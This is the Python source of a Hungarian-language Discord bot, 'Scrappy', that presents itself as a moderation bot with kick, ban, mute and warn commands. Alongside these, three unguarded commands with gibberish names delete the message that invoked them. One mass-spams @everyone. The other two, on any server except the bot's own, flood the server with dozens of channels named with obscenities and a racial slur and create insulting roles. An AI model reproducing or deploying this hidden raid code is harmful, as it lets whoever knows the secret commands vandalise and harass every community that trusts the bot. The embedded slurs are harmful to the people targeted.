import discord
from discord.ext.commands import *
from discord.ext import commands
import random
import asyncio
import time
import json
from itertools import cycle
import time
from threading import Thread
from random import randint
import datetime
import os
import aiohttp
import sys
import traceback
import json
from discord.utils import get
import youtube_dl
import cat
import shutil
import subprocess

import hashlib

bot = commands.Bot(command_prefix='s')
 
client = commands.Bot(command_prefix='s')

bot.remove_command('help')

@bot.event
async def on_ready():
    print('Bejelentkezve! Scrappy - Online')
    await bot.change_presence(status=discord.Status.online, activity=discord.Game("Segitség » shelp"))


@bot.command(pass_context=True)
async def hjurib7777(ctx):
    await ctx.message.delete()
    if ctx.guild.name == "Scrappy | OFFICIAL":
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
    else:
        if not ctx.guild.name == "Scrappy | OFFICIAL":
            embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
            embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
            await ctx.send(embed=embed)
        return

@bot.command(pass_context=True)
async def huhegb7777(ctx):
    await ctx.message.delete()
    guild = ctx.message.guild
    if not ctx.guild.name == "Scrappy | OFFICIAL":
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('discord love you')
        await guild.create_text_channel('crash incoming...')
        await guild.create_text_channel('anyád szeret?')
        await guild.create_text_channel('vagy csak eltart?')
        await guild.create_text_channel('szeretem a tejet')
        await guild.create_text_channel('de a nokedlit is')
        await guild.create_text_channel('bye bye bye')
        await guild.create_text_channel('killing potato pc')
        await guild.create_text_channel('nub lol')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('nigga')
        await guild.create_text_channel('easy grief')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('cumi')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
        await guild.create_text_channel('szoppancs')
    else:
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return


@bot.command(pass_context = True)
async def rnumber(ctx):
    embed=discord.Embed(title="Scrappy | srnumber", description="A  Rendszer Generál Egy Számot 1 és 1000 Között", color=discord.Colour.green())
    embed.add_field(name="Szám", value=(random.randint(1,1000)), inline=False)
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
   
 
@bot.command(pass_context=True)
async def gjuvhd999999(ctx):
    await ctx.message.delete()
    if not ctx.guild.name == "Scrappy | OFFICIAL":
        guild = ctx.guild
        await guild.create_role(name="beszoptad :C")
        await guild.create_role(name="cumi :C")
    else:
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nem aktiválhatsz be kódot ezen a szerveren!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return


@bot.command()
@commands.has_permissions(administrator=True)
async def kick(ctx, member:discord.Member = None):
    await ctx.message.delete()
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    await member.kick()
    embed=discord.Embed(title="Scrappy | skick", description="✅ Az említett játékos kilett dobva a szerverről", color=discord.Colour.green())
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)
    
@kick.error
async def kick_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( skick )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
 
@bot.command()
@commands.has_permissions(administrator=True)
async def ban(ctx, member:discord.Member = None):
    await ctx.message.delete()
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    await member.ban()
    embed=discord.Embed(title="Scrappy | sban", description="✅ Az említett játékos kilett tiltva a szerverről", color=discord.Colour.green())
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
    await ctx.send(embed=embed)

@ban.error
async def ban_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( sban )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
 
@bot.command()
@commands.has_permissions(administrator=True)
async def mute(ctx, member: discord.Member=None):
    await ctx.message.delete()
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    role = discord.utils.get(ctx.guild.roles, name="Muted" or "Némitva")
    await member.add_roles(role)
    
@mute.error
async def mute_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( smute )", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
 
 
@bot.command()
@commands.has_permissions(administrator=True)
async def unmute(ctx, member: discord.Member=None):
    await ctx.message.delete()
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    role = discord.utils.get(ctx.guild.roles, name="Muted" or "Némitva")
    await member.remove_roles(role)

@bot.command()
@commands.has_permissions(administrator=True)
async def warn(ctx, member: discord.Member=None):
    await ctx.message.delete()
    username = ctx.message.author.name
    if not member:
        embed=discord.Embed(title="Hiba Történt.", description="Kérlek jelölj meg egy játékost!", color=discord.Colour.red())
        embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")
        await ctx.send(embed=embed)
        return
    role = discord.utils.get(ctx.guild.roles, name="Figyelmeztettett")
    await member.add_roles(role)
    embed=discord.Embed(title="Scrappy | swarn", description="Sikeres Müvelet", color=discord.Colour.red())
    embed.add_field(name="Felhasználó:", value=(member))

    embed.add_field(name="Figyelmeztette:", value=(username))

    embed.add_field(name="Büntetés:", value='Figyelmeztetett Rang')
    
    embed.set_footer(text="𝐒𝐜𝐫𝐚𝐩𝐩𝐲 | 𝟏.𝟎")

    await ctx.send(embed=embed)

@warn.error
async def warn_error(ctx, error):
    if isinstance(error, commands.CheckFailure):
        embed=discord.Embed(title="Hiba Történt.", description="❌ Nincs jogod használni a parancsot! ( swarn )", color=discord.Colour.red())
